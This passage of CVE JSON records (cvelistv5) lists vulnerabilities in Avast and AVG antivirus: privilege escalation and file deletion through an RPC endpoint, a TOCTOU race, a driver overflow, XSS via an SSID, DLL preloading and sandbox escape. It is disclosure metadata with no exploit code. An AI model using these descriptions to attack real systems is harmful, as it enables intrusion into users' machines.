"cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2017-8308", "datePublished": "2017-04-27T20:00:00", "dateReserved": "2017-04-27T00:00:00", "dateUpdated": "2024-08-05T16:34:22.373Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-10861 (GCVE-0-2020-10861)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
https://forum.avast.com/index.php?topic=232420.0 | x_refsource_MISC | |
https://forum.avast.com/index.php?topic=232423.0 | x_refsource_MISC | |
https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:14:15.669Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to achieve Arbitrary File Deletion from Avast Program Path via RPC, when Self Defense is Enabled." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-01T16:50:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-10861", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to achieve Arbitrary File Deletion from Avast Program Path via RPC, when Self Defense is Enabled." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://forum.avast.com/index.php?topic=232420.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "name": "https://forum.avast.com/index.php?topic=232423.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "name": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md", "refsource": "MISC", "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-10861", "datePublished": "2020-04-01T16:50:01", "dateReserved": "2020-03-23T00:00:00", "dateUpdated": "2024-08-04T11:14:15.669Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2023-1586 (GCVE-0-2023-1586)
Vulnerability from cvelistv5
- CWE-367 - Time-of-check Time-of-use (TOCTOU) Race Condition
Vendor | Product | Version | |||||||
---|---|---|---|---|---|---|---|---|---|
▼ | Avast | Avast Antivirus |
Version: 22.5 |
||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:57:24.083Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-1586", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2025-02-05T16:15:40.831014Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2025-02-05T16:16:16.966Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "Avast Antivirus", "vendor": "Avast", "versions": [ { "lessThanOrEqual": "22.10", "status": "affected", "version": "22.5", "versionType": "22.11" } ] }, { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "AVG Antivirus", "vendor": "AVG", "versions": [ { "lessThanOrEqual": "22.10", "status": "affected", "version": "22.5", "versionType": "22.11" } ] } ], "datePublic": "2023-04-20T19:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Avast and AVG Antivirus for Windows were susceptible to a Time-of-check/Time-of-use (TOCTOU) vulnerability in the restore process leading to arbitrary file creation. The issue was fixed with Avast and AVG Antivirus version 22.11" } ], "value": "Avast and AVG Antivirus for Windows were susceptible to a Time-of-check/Time-of-use (TOCTOU) vulnerability in the restore process leading to arbitrary file creation. The issue was fixed with Avast and AVG Antivirus version 22.11" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-367", "description": "CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-19T18:40:30.809Z", "orgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "shortName": "NLOK" }, "references": [ { "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "source": { "discovery": "UNKNOWN" }, "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "assignerShortName": "NLOK", "cveId": "CVE-2023-1586", "datePublished": "2023-04-19T18:35:09.013Z", "dateReserved": "2023-03-22T22:17:51.936Z", "dateUpdated": "2025-02-05T16:16:16.966Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-20118 (GCVE-0-2020-20118)
Vulnerability from cvelistv5
- n/a
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T14:15:29.023Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://avast.com" }, { "tags": [ "x_transferred" ], "url": "https://gitlab.com/yongchuank/avast-aswsnx-ioctl-82ac0060-oob-write" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2020-20118", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-11-08T16:33:35.277566Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-11-08T16:33:43.547Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Buffer Overflow vulnerability in Avast AntiVirus before v.19.7 allows a local attacker to cause a denial of service via a crafted request to the aswSnx.sys driver." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-07-11T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "http://avast.com" }, { "url": "https://gitlab.com/yongchuank/avast-aswsnx-ioctl-82ac0060-oob-write" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-20118", "datePublished": "2023-07-11T00:00:00", "dateReserved": "2020-08-13T00:00:00", "dateUpdated": "2024-11-08T16:33:43.547Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2019-18653 (GCVE-0-2019-18653)
Vulnerability from cvelistv5
- n/a
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T01:54:14.551Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://medium.com/%40YoKoKho/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://firstsight.me/2019/10/5000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A Cross Site Scripting (XSS) issue exists in Avast AntiVirus (Free, Internet Security, and Premiere Edition) 19.3.2369 build 19.3.4241.440 in the Network Notification Popup, allowing an attacker to execute JavaScript code via an SSID Name." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-11-01T18:25:08", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://medium.com/%40YoKoKho/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968" }, { "tags": [ "x_refsource_MISC" ], "url": "http://firstsight.me/2019/10/5000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2019-18653", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A Cross Site Scripting (XSS) issue exists in Avast AntiVirus (Free, Internet Security, and Premiere Edition) 19.3.2369 build 19.3.4241.440 in the Network Notification Popup, allowing an attacker to execute JavaScript code via an SSID Name." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://medium.com/@YoKoKho/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968", "refsource": "MISC", "url": "https://medium.com/@YoKoKho/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968" }, { "name": "http://firstsight.me/2019/10/5000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop/", "refsource": "MISC", "url": "http://firstsight.me/2019/10/5000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2019-18653", "datePublished": "2019-11-01T18:25:08", "dateReserved": "2019-10-31T00:00:00", "dateUpdated": "2024-08-05T01:54:14.551Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2019-17093 (GCVE-0-2019-17093)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
https://safebreach.com/blog | x_refsource_MISC | |
https://safebreach.com/Post/Avast-Antivirus-AVG-Antivirus-DLL-Preloading-into-PPL-and-Potential-Abuses | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T01:33:16.465Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://safebreach.com/blog" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://safebreach.com/Post/Avast-Antivirus-AVG-Antivirus-DLL-Preloading-into-PPL-and-Potential-Abuses" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast antivirus before 19.8 and AVG antivirus before 19.8. A DLL Preloading vulnerability allows an attacker to implant %WINDIR%\\system32\\wbemcomn.dll, which is loaded into a protected-light process (PPL) and might bypass some of the self-defense mechanisms. This affects all components that use WMI, e.g., AVGSvc.exe 19.6.4546.0 and TuneupSmartScan.dll 19.1.884.0." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-10-23T16:59:08", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://safebreach.com/blog" }, { "tags": [ "x_refsource_MISC" ], "url": "https://safebreach.com/Post/Avast-Antivirus-AVG-Antivirus-DLL-Preloading-into-PPL-and-Potential-Abuses" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2019-17093", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Avast antivirus before 19.8 and AVG antivirus before 19.8. A DLL Preloading vulnerability allows an attacker to implant %WINDIR%\\system32\\wbemcomn.dll, which is loaded into a protected-light process (PPL) and might bypass some of the self-defense mechanisms. This affects all components that use WMI, e.g., AVGSvc.exe 19.6.4546.0 and TuneupSmartScan.dll 19.1.884.0." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://safebreach.com/blog", "refsource": "MISC", "url": "https://safebreach.com/blog" }, { "name": "https://safebreach.com/Post/Avast-Antivirus-AVG-Antivirus-DLL-Preloading-into-PPL-and-Potential-Abuses", "refsource": "MISC", "url": "https://safebreach.com/Post/Avast-Antivirus-AVG-Antivirus-DLL-Preloading-into-PPL-and-Potential-Abuses" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2019-17093", "datePublished": "2019-10-23T16:59:08", "dateReserved": "2019-10-02T00:00:00", "dateUpdated": "2024-08-05T01:33:16.465Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2021-45336 (GCVE-0-2021-45336)
Vulnerability from cvelistv5
- n/a
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:39:20.536Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Privilege escalation vulnerability in the Sandbox component of Avast Antivirus prior to 20.4 allows a local sandboxed code to gain elevated privileges by using system IPC interfaces which could lead to exit the sandbox and acquire SYSTEM privileges." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-12-27T12:35:42", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2021-45336", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Privilege escalation vulnerability in the Sandbox component of Avast Antivirus prior to 20.4 allows a local sandboxed code to gain elevated privileges by using system IPC interfaces which could lead to exit the sandbox and acquire SYSTEM privileges." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0", "refsource": "MISC", "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "name": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5", "refsource": "MISC", "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-45336", "datePublished": "2021-12-27T12:35:42", "dateReserved": "2021-12-20T00:00:00", "dateUpdated": "2024-08-04T04:39:20.536Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-10864 (GCVE-0-2020-10864)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
https://forum.avast.com/index.php?topic=232420.0 | x_refsource_MISC | |
https://forum.avast.com/index.php?topic=232423.0 | x_refsource_MISC | |
https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:14:15.676Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to trigger a reboot via RPC from a Low Integrity process." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-01T17:00:20", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-10864", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to trigger a reboot via RPC from a Low Integrity process." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://forum.avast.com/index.php?topic=232420.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "name": "https://forum.avast.com/index.php?topic=232423.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "name": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md", "refsource": "MISC", "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-10864", "datePublished": "2020-04-01T17:00:20", "dateReserved": "2020-03-23T00:00:00", "dateUpdated": "2024-08-04T11:14:15.676Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2021-45338 (GCVE-0-2021-45338)
Vulnerability from cvelistv5
- n/a
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:39:20.481Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.1" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.2" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.3" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Multiple privilege escalation vulnerabilities in Avast Antivirus prior to 20.4 allow a local user to gain elevated privileges by calling unnecessarily powerful internal methods of the main antivirus service which could lead to the (1) arbitrary file delete, (2) write and (3) reset security." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-12-27T12:53:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.1" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.2" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.3" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2021-45338", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Multiple privilege escalation vulnerabilities in Avast Antivirus prior to 20.4 allow a local user to gain elevated privileges by calling unnecessarily powerful internal methods of the main antivirus service which could lead to the (1) arbitrary file delete, (2) write and (3) reset security." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0", "refsource": "MISC", "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "name": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.1", "refsource": "MISC", "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.1" }, { "name": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.2", "refsource": "MISC", "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.2" }, { "name": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.3", "refsource": "MISC", "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.3" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-45338", "datePublished": "2021-12-27T12:53:00", "dateReserved": "2021-12-20T00:00:00", "dateUpdated": "2024-08-04T04:39:20.481Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-10862 (GCVE-0-2020-10862)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
https://forum.avast.com/index.php?topic=232420.0 | x_refsource_MISC | |
https://forum.avast.com/index.php?topic=232423.0 | x_refsource_MISC | |
https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:14:15.769Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to achieve Local Privilege Escalation (LPE) via RPC." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-01T16:53:52", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-10862", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to achieve Local Privilege Escalation (LPE) via RPC." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://forum.avast.com/index.php?topic=232420.0", 